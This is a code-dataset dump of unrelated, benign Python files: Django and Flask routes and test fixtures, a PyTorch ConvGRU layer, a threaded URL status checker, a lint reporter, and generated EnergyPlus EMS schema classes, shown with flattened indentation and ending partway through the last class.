urlpatterns = patterns('',
url(r'^$', views.list_tags),
)
| StarcoderdataPython |
1711878 | <gh_stars>100-1000
import torch
import torch.nn as nn
class ConvGRU(nn.Module):
def __init__(self, h_planes=128, i_planes=128):
super(ConvGRU, self).__init__()
self.do_checkpoint = False
self.convz = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.convr = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.convq = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.w = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convz_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convr_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convq_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
def forward(self, net, *inputs):
inp = torch.cat(inputs, dim=1)
net_inp = torch.cat([net, inp], dim=1)
b, c, h, w = net.shape
glo = torch.sigmoid(self.w(net)) * net
glo = glo.view(b, c, h*w).mean(-1).view(b, c, 1, 1)
z = torch.sigmoid(self.convz(net_inp) + self.convz_glo(glo))
r = torch.sigmoid(self.convr(net_inp) + self.convr_glo(glo))
q = torch.tanh(self.convq(torch.cat([r*net, inp], dim=1)) + self.convq_glo(glo))
net = (1-z) * net + z * q
return net
| StarcoderdataPython |
43726 | # -*- coding: utf-8 -*-
"""
An example url status checker implementation consumes urls from a queue.
"""
import threading
import queue
import requests
class StatusChecker(threading.Thread):
"""
The thread that will check HTTP statuses.
"""
#: The queue of urls
url_queue = None
#: The queue our results will go into
result_queue = None
def __init__(self, url_queue, result_queue):
super().__init__()
self.url_queue = url_queue
self.result_queue = result_queue
def run(self):
while True:
try:
# this will throw queue.Empty immediately if there's
# no tasks left
to_check = self.url_queue.get_nowait()
except queue.Empty:
break # empty queue, we're done!
else:
resp = requests.get(to_check)
self.result_queue.put((to_check, resp.status_code,))
self.url_queue.task_done() # the the queue we're done
if __name__ == '__main__':
urls = (
'http://httpbin.org/status/418',
'http://httpbin.org/status/200',
'http://httpbin.org/status/404',
'http://httpbin.org/status/500',
)
url_queue = queue.Queue()
for url in urls:
url_queue.put(url)
result_queue = queue.Queue()
num_workers = 2
for i in range(num_workers):
t = StatusChecker(url_queue, result_queue)
print('Starting worker {}'.format(i))
t.start()
# wait for the queue to empty
url_queue.join()
while not result_queue.empty():
url, status = result_queue.get_nowait()
print('{} - {}'.format(url, status))
| StarcoderdataPython |
3253918 | <filename>microcosm_flask/tests/conventions/fixtures.py
"""
Testing fixtures (e.g. for CRUD).
"""
from copy import copy
from enum import Enum, unique
from uuid import uuid4
from marshmallow import Schema, fields
from microcosm_flask.decorators.schemas import SelectedField, add_associated_schema
from microcosm_flask.fields import EnumField
from microcosm_flask.linking import Link, Links
from microcosm_flask.namespaces import Namespace
from microcosm_flask.operations import Operation
@unique
class EyeColor(Enum):
"""
Natural eye colors
"""
PURPLE = "PURPLE"
TEAL = "TEAL"
RUBY = "RUBY"
class Address:
def __init__(self, id, person_id, address_line):
self.id = id
self.person_id = person_id
self.address_line = address_line
class Person:
def __init__(self, id, first_name, last_name):
self.id = id
self.first_name = first_name
self.last_name = last_name
class NewAddressSchema(Schema):
    """Request schema for creating an address (no id assigned yet)."""

    # exposed as camelCase "addressLine", stored on the snake_case attribute
    addressLine = fields.String(attribute="address_line", required=True)


class NewPersonSchema(Schema):
    """Request schema for creating a person (no id assigned yet)."""

    # both attribute and data_key fields should result in the same swagger definition
    firstName = fields.String(attribute="first_name", required=True)
    last_name = fields.String(data_key="lastName", required=True)
    eye_color = EnumField(EyeColor, data_key="eyeColor")
    email = fields.Email()

    @property
    def csv_column_order(self):
        # column ordering used when this schema is rendered as CSV
        return ["firstName", "lastName"]


class NewPersonBatchSchema(Schema):
    """Batch wrapper around a list of NewPersonSchema items."""

    items = fields.List(fields.Nested(NewPersonSchema))


class UpdatePersonSchema(Schema):
    """Patch schema for a person; all fields optional."""

    firstName = fields.String(attribute="first_name")
    last_name = fields.String(data_key="lastName")
class AddressCSVSchema(NewAddressSchema):
    """CSV-friendly address schema."""

    # Same as AddressSchema, without the added links
    id = fields.UUID(required=True)


class AddressSchema(AddressCSVSchema):
    """Response schema for an address, including hypermedia links."""

    _links = fields.Method("get_links", dump_only=True)

    def get_links(self, obj):
        # build a "self" link pointing back at the Retrieve operation for obj
        links = Links()
        links["self"] = Link.for_(
            Operation.Retrieve,
            Namespace(subject=Address),
            address_id=obj.id,
        )
        return links.to_dict()


class DeleteAddressSchema(Schema):
    """Request schema for deleting an address (optimistic-lock clock value)."""

    address_clock = fields.Int(required=True)
class PersonCSVSchema(NewPersonSchema):
    """CSV-friendly person schema: PersonSchema without the added links."""

    id = fields.UUID(required=True)

    @property
    def csv_column_order(self):
        # "id" leads, followed by the parent schema's CSV columns.
        # (Fixes the stray space before `.extend` and drops the redundant
        # list-comprehension copy; uses py3 zero-argument super().)
        return ["id"] + list(super().csv_column_order)
class RecursiveSchema(Schema):
    """Schema that nests itself; exercises recursive schema definitions."""

    # the lambda defers evaluation so the class can reference itself
    children = fields.List(fields.Nested(lambda: RecursiveSchema()))


def pubsub_schema(fields):
    """
    Example usage of `add_associated_schema`, creating an additional decorator
    that adds syntactic sugar and makes the intent clear

    :param fields: field names (or SelectedField entries) to project into the
        generated "PubsubMessage"-suffixed schema
    """
    # NOTE: the parameter intentionally shadows marshmallow's `fields` module
    # inside this function; renaming it would break keyword callers.
    return add_associated_schema("PubsubMessage", fields)
@pubsub_schema([
    "email",
    "firstName",
])
# Other example not using the shorthand
@add_associated_schema(
    "Foo",
    [
        SelectedField("email", required=True),
        SelectedField("firstName", required=False)
    ]
)
class PersonSchema(PersonCSVSchema):
    """Response schema for a person, including hypermedia links."""

    _links = fields.Method("get_links", dump_only=True)

    def get_links(self, obj):
        # build a "self" link pointing back at the Retrieve operation for obj
        links = Links()
        links["self"] = Link.for_(
            Operation.Retrieve,
            Namespace(subject=Person),
            person_id=obj.id,
        )
        return links.to_dict()
class PersonLookupSchema(Schema):
    """Query-string schema for person retrieval."""

    family_member = fields.Boolean(required=False)


class PersonBatchSchema(NewPersonSchema):
    """Batch wrapper around a list of PersonSchema items."""

    # NOTE(review): inherits NewPersonSchema (not Schema), so the batch also
    # carries the new-person fields -- presumably intentional; confirm.
    items = fields.List(fields.Nested(PersonSchema))
# Well-known fixture ids and instances shared by the convention tests below.
ADDRESS_ID_1 = uuid4()

PERSON_ID_1 = uuid4()
PERSON_ID_2 = uuid4()
PERSON_ID_3 = uuid4()

PERSON_1 = Person(PERSON_ID_1, "Alice", "Smith")
PERSON_2 = Person(PERSON_ID_2, "Bob", "Jones")
PERSON_3 = Person(PERSON_ID_3, "Charlie", "Smith")

ADDRESS_1 = Address(ADDRESS_ID_1, PERSON_ID_1, "21 Acme St., San Francisco CA 94110")
def address_retrieve(id, address_id):
    """Fake retrieve controller: always returns the canned address fixture."""
    return ADDRESS_1


def address_delete(address_id, address_clock):
    """Fake delete controller: succeeds only for the well-known address id."""
    return address_id == ADDRESS_ID_1
def address_search(offset, limit, list_param=None, enum_param=None):
    """Fake search controller; echoes the optional params into the address line."""
    both_params_given = list_param is not None and enum_param is not None
    if not both_params_given:
        return [ADDRESS_1], 1
    # encode the received parameters into the address line so tests can
    # assert they were parsed correctly
    echoed_line = ",".join(list_param) + str(len(list_param)) + enum_param.value
    return [Address(ADDRESS_ID_1, PERSON_ID_1, echoed_line)], 1
def person_create(**kwargs):
    """Fake create controller: assigns the well-known second person id."""
    return Person(id=PERSON_ID_2, **kwargs)


def person_search(offset, limit):
    """Fake search controller: single-item result set with its total count."""
    return [PERSON_1], 1


def person_update_batch(items):
    """Fake batch-update controller: re-creates each submitted item."""
    return dict(
        items=[
            person_create(**item)
            for item in items
        ]
    )
def person_retrieve(person_id, family_member=None):
    """Fake retrieve controller, with an optional family-member variant."""
    if family_member:
        return PERSON_3
    if person_id == PERSON_ID_1:
        return PERSON_1
    return None
def person_delete(person_id):
    """Fake delete controller: succeeds only for the well-known person id."""
    return person_id == PERSON_ID_1


def person_delete_batch():
    """Fake batch-delete controller: always succeeds."""
    return True


def person_replace(person_id, **kwargs):
    """Fake replace (PUT) controller: builds a person with the given id."""
    return Person(id=person_id, **kwargs)
def person_update(person_id, **kwargs):
    """Fake update (PATCH) controller: applies kwargs onto a copy of PERSON_1."""
    if person_id != PERSON_ID_1:
        return None
    # Copy to avoid changing attr of constant
    patched = copy(PERSON_1)
    for attr_name, attr_value in kwargs.items():
        setattr(patched, attr_name, attr_value)
    return patched
| StarcoderdataPython |
3372271 | <reponame>imfiver/Sec-Tools
from django.contrib import admin
from django.urls import path
from . import views
from dirscan import views, search2, target
# Route table for the dirscan app; handlers live in views, search2 and target.
# NOTE(review): `views` is imported twice above (from this package and from
# dirscan); the dirscan import wins -- confirm that is intended.
urlpatterns = [
    path('dir-result/', views.dirresult, name="dir-result"),
    path('dir-search/', search2.search_post, name="dir-search"),
    path('get-target/', target.get_target, name="get-target")
]
| StarcoderdataPython |
3265367 | # coding=utf-8
"""
Provides an implementation of a reporting mode for human readers.
"""
import os
from comply.rules.rule import RuleViolation
from comply.reporting.base import Reporter
from comply.printing import printout, Colors
class HumanReporter(Reporter):
    """ Provides reporting output (including suggestions) formatted for human readers. """

    def report(self, violations: list, path: str):
        """Print every violation found in the file at `path`, grouped by reason."""
        # determine absolute path of file
        absolute_path = os.path.abspath(path)
        # group violations by reason so that we can suppress similar ones
        grouped = self.group_by_reason(violations)
        num_reported_results = 0
        # NOTE: the loop rebinds the `violations` parameter with each group's subset
        for reason, violations in grouped.items():
            results = []
            for violation in violations:
                result = self.formatted_result(violation, reason, absolute_path)
                results.append(result)
            num_reported_results += self.report_results(results, prefix_if_suppressed='\n')
        if self.is_verbose and num_reported_results > 0:
            # make sure we separate the "Checking..." message with a newline
            # note that this only occur when --verbose is set
            printout('')

    def formatted_result(self, violation: RuleViolation, reason: str, path: str) -> str:
        """ Return a formatted result of a rule violation.

        The result is a multi-line, ANSI-colored string: a reason/rule header,
        the file location, the offending line(s) with line numbers, and the
        rule's suggested solution (if any).
        """
        rule = violation.which
        # let the rule attach any additional context to the violation first
        rule.augment(violation)
        location = Colors.DARK + '{0}:'.format(path) + Colors.RESET
        severity = RuleViolation.report_severity_as(rule.severity, self.is_strict)
        # pick a tint matching the (possibly strict-mode-promoted) severity
        severity_color = (Colors.DENY if severity > RuleViolation.WARN else
                          (Colors.WARN if severity > RuleViolation.ALLOW else
                           Colors.ALLOW))
        if reason is None or len(reason) == 0:
            # fall back to a generic reason derived from severity
            reason = ('Severe violation' if severity > RuleViolation.WARN else
                      ('Cautioned violation' if severity > RuleViolation.ALLOW else
                       'Allowed violation'))
        why = '{tint}{0} {vague}[{1}]'.format(reason, rule.name,
                                              tint=severity_color,
                                              vague=Colors.VAGUE) + Colors.RESET
        solution = rule.solution(violation)
        output = '{reason} in\n{location}'.format(
            reason=why, location=location)
        if len(violation.lines) > 0:
            context = '\n'
            for i, (linenumber, line) in enumerate(violation.lines):
                # a "line" can, in some cases, actually span several lines
                # (typically rules that match functions with parameters spanning several lines,
                # so the entire function signature is considered "the line")
                expanded_lines = HumanReporter.expand_line(linenumber, line)
                for j, (n, l) in enumerate(expanded_lines):
                    if n is None:
                        # no line number for this sub-line; render an empty gutter
                        n = ''
                    # NOTE: rebinds the outer loop variable `line` with the
                    # tab-expanded text of the current sub-line
                    line = l.expandtabs(4)
                    lineno = str(n)
                    pad = ' '
                    context += Colors.EMPHASIS + lineno + Colors.RESET
                    context += Colors.RESET + '{0}{1}'.format(
                        ('\t' + pad) if len(lineno) < 4 else pad, line)  # assumes lineno < 9999
                    if j != len(expanded_lines) - 1:
                        context += '\n'
                if i != len(violation.lines) - 1:
                    context += '\n'
            output += context
        if solution is not None and len(solution) > 0:
            output += '\n{strong}{suggestion}'.format(
                suggestion=solution, strong=Colors.STRONG)
        return '\n' + output + Colors.RESET

    @staticmethod
    def expand_line(line_number: int, line: str):
        """ Like str.splitlines() except including line numbers. """
        if len(line) == 0:
            # keep an entry for the empty line rather than dropping it
            return [(line_number, line)]
        lines = []
        for i, l in enumerate(line.splitlines()):
            lines.append(
                (line_number + i if line_number is not None else None, l)
            )
        return lines
| StarcoderdataPython |
1799951 | """ Data objects in group "Energy Management System"
"""
from collections import OrderedDict
import logging
from pyidf.helper import DataObject
logger = logging.getLogger("pyidf")
logger.addHandler(logging.NullHandler())
class EnergyManagementSystemSensor(DataObject):

    """ Corresponds to IDD object `EnergyManagementSystem:Sensor`
        Declares EMS variable as a sensor
        a list of output variables and meters that can be reported are available after a run on
        the report (.rdd) or meter dictionary file (.mdd) if the Output:VariableDictionary
        has been requested.
    """
    # IDD metadata consumed by the DataObject base class: field names,
    # ordering, types and validation constraints for this object.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'output:variable or output:meter index key name',
                                       {'name': u'Output:Variable or Output:Meter Index Key Name',
                                        'pyname': u'outputvariable_or_outputmeter_index_key_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'output:variable or output:meter name',
                                       {'name': u'Output:Variable or Output:Meter Name',
                                        'pyname': u'outputvariable_or_outputmeter_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'external-list'})]),
               'format': None,
               'group': u'Energy Management System',
               'min-fields': 3,
               'name': u'EnergyManagementSystem:Sensor',
               'pyname': u'EnergyManagementSystemSensor',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        | This name becomes a variable for use in Erl programs
        | no spaces allowed in name

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def outputvariable_or_outputmeter_index_key_name(self):
        """field `Output:Variable or Output:Meter Index Key Name`

        Args:
            value (str): value for IDD Field `Output:Variable or Output:Meter Index Key Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `outputvariable_or_outputmeter_index_key_name` or None if not set

        """
        return self["Output:Variable or Output:Meter Index Key Name"]

    @outputvariable_or_outputmeter_index_key_name.setter
    def outputvariable_or_outputmeter_index_key_name(self, value=None):
        """ Corresponds to IDD field `Output:Variable or Output:Meter Index Key Name`
        """
        self["Output:Variable or Output:Meter Index Key Name"] = value

    @property
    def outputvariable_or_outputmeter_name(self):
        """field `Output:Variable or Output:Meter Name`

        Args:
            value (str): value for IDD Field `Output:Variable or Output:Meter Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `outputvariable_or_outputmeter_name` or None if not set

        """
        return self["Output:Variable or Output:Meter Name"]

    @outputvariable_or_outputmeter_name.setter
    def outputvariable_or_outputmeter_name(self, value=None):
        """ Corresponds to IDD field `Output:Variable or Output:Meter Name`
        """
        self["Output:Variable or Output:Meter Name"] = value
class EnergyManagementSystemActuator(DataObject):

    """ Corresponds to IDD object `EnergyManagementSystem:Actuator`
        Hardware portion of EMS used to set up actuators in the model
    """
    # IDD metadata consumed by the DataObject base class: field names,
    # ordering, types and validation constraints for this object.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'actuated component unique name',
                                       {'name': u'Actuated Component Unique Name',
                                        'pyname': u'actuated_component_unique_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'actuated component type',
                                       {'name': u'Actuated Component Type',
                                        'pyname': u'actuated_component_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'actuated component control type',
                                       {'name': u'Actuated Component Control Type',
                                        'pyname': u'actuated_component_control_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'})]),
               'format': None,
               'group': u'Energy Management System',
               'min-fields': 4,
               'name': u'EnergyManagementSystem:Actuator',
               'pyname': u'EnergyManagementSystemActuator',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        | This name becomes a variable for use in Erl programs
        | no spaces allowed in name

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def actuated_component_unique_name(self):
        """field `Actuated Component Unique Name`

        Args:
            value (str): value for IDD Field `Actuated Component Unique Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `actuated_component_unique_name` or None if not set

        """
        return self["Actuated Component Unique Name"]

    @actuated_component_unique_name.setter
    def actuated_component_unique_name(self, value=None):
        """Corresponds to IDD field `Actuated Component Unique Name`"""
        self["Actuated Component Unique Name"] = value

    @property
    def actuated_component_type(self):
        """field `Actuated Component Type`

        Args:
            value (str): value for IDD Field `Actuated Component Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `actuated_component_type` or None if not set

        """
        return self["Actuated Component Type"]

    @actuated_component_type.setter
    def actuated_component_type(self, value=None):
        """Corresponds to IDD field `Actuated Component Type`"""
        self["Actuated Component Type"] = value

    @property
    def actuated_component_control_type(self):
        """field `Actuated Component Control Type`

        Args:
            value (str): value for IDD Field `Actuated Component Control Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `actuated_component_control_type` or None if not set

        """
        return self["Actuated Component Control Type"]

    @actuated_component_control_type.setter
    def actuated_component_control_type(self, value=None):
        """Corresponds to IDD field `Actuated Component Control Type`"""
        self["Actuated Component Control Type"] = value
class EnergyManagementSystemProgramCallingManager(DataObject):

    """ Corresponds to IDD object `EnergyManagementSystem:ProgramCallingManager`
        Input EMS program. a program needs a name
        a description of when it should be called
        and then lines of program code for EMS Runtime language
    """
    # IDD metadata consumed by the DataObject base class. The extensible
    # group allows an arbitrary number of "Program Name N" entries.
    _schema = {'extensible-fields': OrderedDict([(u'program name 1',
                                                  {'name': u'Program Name 1',
                                                   'pyname': u'program_name_1',
                                                   'required-field': True,
                                                   'autosizable': False,
                                                   'autocalculatable': False,
                                                   'type': u'object-list'})]),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'energyplus model calling point',
                                       {'name': u'EnergyPlus Model Calling Point',
                                        'pyname': u'energyplus_model_calling_point',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'BeginNewEnvironment',
                                                            u'AfterNewEnvironmentWarmUpIsComplete',
                                                            u'BeginTimestepBeforePredictor',
                                                            u'AfterPredictorBeforeHVACManagers',
                                                            u'AfterPredictorAfterHVACManagers',
                                                            u'InsideHVACSystemIterationLoop',
                                                            u'EndOfZoneTimestepBeforeZoneReporting',
                                                            u'EndOfZoneTimestepAfterZoneReporting',
                                                            u'EndOfSystemTimestepBeforeHVACReporting',
                                                            u'EndOfSystemTimestepAfterHVACReporting',
                                                            u'EndOfZoneSizing',
                                                            u'EndOfSystemSizing',
                                                            u'AfterComponentInputReadIn',
                                                            u'UserDefinedComponentModel',
                                                            u'UnitarySystemSizing'],
                                        'autocalculatable': False,
                                        'type': 'alpha'})]),
               'format': None,
               'group': u'Energy Management System',
               'min-fields': 3,
               'name': u'EnergyManagementSystem:ProgramCallingManager',
               'pyname': u'EnergyManagementSystemProgramCallingManager',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        | no spaces allowed in name

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def energyplus_model_calling_point(self):
        """field `EnergyPlus Model Calling Point`

        Args:
            value (str): value for IDD Field `EnergyPlus Model Calling Point`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `energyplus_model_calling_point` or None if not set

        """
        return self["EnergyPlus Model Calling Point"]

    @energyplus_model_calling_point.setter
    def energyplus_model_calling_point(self, value=None):
        """Corresponds to IDD field `EnergyPlus Model Calling Point`"""
        self["EnergyPlus Model Calling Point"] = value

    def add_extensible(self,
                       program_name_1=None,
                       ):
        """Add values for extensible fields.

        Args:

            program_name_1 (str): value for IDD Field `Program Name 1`
                if `value` is None it will not be checked against the
                specification and is assumed to be a missing value

        """
        vals = []
        program_name_1 = self.check_value("Program Name 1", program_name_1)
        vals.append(program_name_1)
        self._extdata.append(vals)

    @property
    def extensibles(self):
        """Get list of all extensibles."""
        return self._extdata

    @extensibles.setter
    def extensibles(self, extensibles):
        """Replaces extensible fields with `extensibles`

        Args:
            extensibles (list): nested list of extensible values

        """
        self._extdata = []
        for ext in extensibles:
            self.add_extensible(*ext)
class EnergyManagementSystemOutputVariable(DataObject):

    """ Corresponds to IDD object `EnergyManagementSystem:OutputVariable`
        This object sets up an EnergyPlus output variable from an Erl variable
    """
    # IDD metadata consumed by the DataObject base class: field names,
    # ordering, types and validation constraints for this object.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'ems variable name',
                                       {'name': u'EMS Variable Name',
                                        'pyname': u'ems_variable_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'type of data in variable',
                                       {'name': u'Type of Data in Variable',
                                        'pyname': u'type_of_data_in_variable',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Averaged',
                                                            u'Summed'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'update frequency',
                                       {'name': u'Update Frequency',
                                        'pyname': u'update_frequency',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'ZoneTimestep',
                                                            u'SystemTimestep'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'ems program or subroutine name',
                                       {'name': u'EMS Program or Subroutine Name',
                                        'pyname': u'ems_program_or_subroutine_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'units',
                                       {'name': u'Units',
                                        'pyname': u'units',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'})]),
               'format': None,
               'group': u'Energy Management System',
               'min-fields': 4,
               'name': u'EnergyManagementSystem:OutputVariable',
               'pyname': u'EnergyManagementSystemOutputVariable',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def ems_variable_name(self):
        """field `EMS Variable Name`

        | must be an acceptable EMS variable

        Args:
            value (str): value for IDD Field `EMS Variable Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `ems_variable_name` or None if not set

        """
        return self["EMS Variable Name"]

    @ems_variable_name.setter
    def ems_variable_name(self, value=None):
        """Corresponds to IDD field `EMS Variable Name`"""
        self["EMS Variable Name"] = value

    @property
    def type_of_data_in_variable(self):
        """field `Type of Data in Variable`

        Args:
            value (str): value for IDD Field `Type of Data in Variable`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `type_of_data_in_variable` or None if not set

        """
        return self["Type of Data in Variable"]

    @type_of_data_in_variable.setter
    def type_of_data_in_variable(self, value=None):
        """Corresponds to IDD field `Type of Data in Variable`"""
        self["Type of Data in Variable"] = value

    @property
    def update_frequency(self):
        """field `Update Frequency`

        Args:
            value (str): value for IDD Field `Update Frequency`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `update_frequency` or None if not set

        """
        return self["Update Frequency"]

    @update_frequency.setter
    def update_frequency(self, value=None):
        """Corresponds to IDD field `Update Frequency`"""
        self["Update Frequency"] = value

    @property
    def ems_program_or_subroutine_name(self):
        """field `EMS Program or Subroutine Name`

        | optional for global scope variables, required for local scope variables

        Args:
            value (str): value for IDD Field `EMS Program or Subroutine Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `ems_program_or_subroutine_name` or None if not set

        """
        return self["EMS Program or Subroutine Name"]

    @ems_program_or_subroutine_name.setter
    def ems_program_or_subroutine_name(self, value=None):
        """Corresponds to IDD field `EMS Program or Subroutine Name`"""
        self["EMS Program or Subroutine Name"] = value

    @property
    def units(self):
        """field `Units`

        | optional but will result in dimensionless units for blank
        | EnergyPlus units are standard SI units

        Args:
            value (str): value for IDD Field `Units`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `units` or None if not set

        """
        return self["Units"]

    @units.setter
    def units(self, value=None):
        """Corresponds to IDD field `Units`"""
        self["Units"] = value
class EnergyManagementSystemMeteredOutputVariable(DataObject):

    """ Corresponds to IDD object `EnergyManagementSystem:MeteredOutputVariable`
        This object sets up an EnergyPlus output variable from an Erl variable
    """
    # IDD metadata consumed by the DataObject base class: field names,
    # ordering, types and validation constraints for this object.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'ems variable name',
                                       {'name': u'EMS Variable Name',
                                        'pyname': u'ems_variable_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'update frequency',
                                       {'name': u'Update Frequency',
                                        'pyname': u'update_frequency',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'ZoneTimestep',
                                                            u'SystemTimestep'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'ems program or subroutine name',
                                       {'name': u'EMS Program or Subroutine Name',
                                        'pyname': u'ems_program_or_subroutine_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'resource type',
                                       {'name': u'Resource Type',
                                        'pyname': u'resource_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Electricity',
                                                            u'NaturalGas',
                                                            u'Gasoline',
                                                            u'Diesel',
                                                            u'Coal',
                                                            u'FuelOil#1',
                                                            u'FuelOil#2',
                                                            u'Propane',
                                                            u'OtherFuel1',
                                                            u'OtherFuel2',
                                                            u'WaterUse',
                                                            u'OnSiteWaterProduced',
                                                            u'MainsWaterSupply',
                                                            u'RainWaterCollected',
                                                            u'WellWaterDrawn',
                                                            u'CondensateWaterCollected',
                                                            u'EnergyTransfer',
                                                            u'Steam',
                                                            u'DistrictCooling',
                                                            u'DistrictHeating',
                                                            u'ElectricityProducedOnSite',
                                                            u'SolarWaterHeating',
                                                            u'SolarAirHeating'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'group type',
                                       {'name': u'Group Type',
                                        'pyname': u'group_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Building',
                                                            u'HVAC',
                                                            u'Plant',
                                                            u'System'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'end-use category',
                                       {'name': u'End-Use Category',
                                        'pyname': u'enduse_category',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Heating',
                                                            u'Cooling',
                                                            u'InteriorLights',
                                                            u'ExteriorLights',
                                                            u'InteriorEquipment',
                                                            u'ExteriorEquipment',
                                                            u'Fans',
                                                            u'Pumps',
                                                            u'HeatRejection',
                                                            u'Humidifier',
                                                            u'HeatRecovery',
                                                            u'WaterSystems',
                                                            u'Refrigeration',
                                                            u'OnSiteGeneration',
                                                            u'HeatingCoils',
                                                            u'CoolingCoils',
                                                            u'Chillers',
                                                            u'Boilers',
                                                            u'Baseboard',
                                                            u'HeatRecoveryForCooling',
                                                            u'HeatRecoveryForHeating'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'end-use subcategory',
                                       {'name': u'End-Use Subcategory',
                                        'pyname': u'enduse_subcategory',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'units',
                                       {'name': u'Units',
                                        'pyname': u'units',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'})]),
               'format': None,
               'group': u'Energy Management System',
               'min-fields': 7,
               'name': u'EnergyManagementSystem:MeteredOutputVariable',
               'pyname': u'EnergyManagementSystemMeteredOutputVariable',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set

        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
